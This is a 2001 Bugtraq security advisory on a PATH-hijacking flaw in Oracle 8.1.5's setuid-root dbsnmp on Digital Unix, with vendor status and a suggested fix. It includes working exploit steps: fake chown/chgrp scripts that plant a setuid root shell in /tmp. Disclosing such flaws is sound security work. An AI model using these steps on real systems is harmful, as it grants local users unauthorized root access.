Date: Wed, 1 Aug 2001 19:14:07 +0200
From: Ismael Briones <ismael@el-mundo.net>
To: bugtraq@securityfocus.com
Subject: Oracle 8.1.5 dbnsmp vulnerability
Title: Vulnerability in dbsnmp in Oracle 8.1.5
Date: 01-08-2001
Platform: Only tested in Digital Unix.
Impact: Any user can gain root privileges
Author: Ismael Briones Vilar (ismael@el-mundo.net)
Status: Vendor Contacted, and they are investigating a fix .
PROBLEM SUMMARY:
There is a problem in dbsnmp that can be used by local users to obtain
root privileges. The dbsnmp is setuid root. When a user execute dbsnmp there
is a call to chown and chgrp, but without especify the path, so any user can
define his PATH variable to exploit this vulnerability:
Probed in Oracle 8.1.5.
Oracle 8.1.6 is not vulnerable
IMPACT:
Any user with local access, can gain root privileges
SOLUTION:
Maybe a chmod -s
STATUS:
Vendor was contacted 30/07/2001 and Oracle answer:
"We are investigating a fix as we speak."
EXPLOIT:
export PATH=~/bin/:$PATH
Then we create the file ~/bin/chown or ~/bin/chgrp:
#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX
(We have to put all in the same line, separated by semicolon)
We make our chown or chgrp executable:
chmod +x ~/bin/chown
chmod +x ~/bin/chgrp
When the user execute dbsnmp, the system look for chown in the first
directory of the PATH variable, execute our chown file and whe have a shell
setuid root in /tmp/XXX.
-------------------------
Ismael Briones Vilar
ismael@el-mundo.net
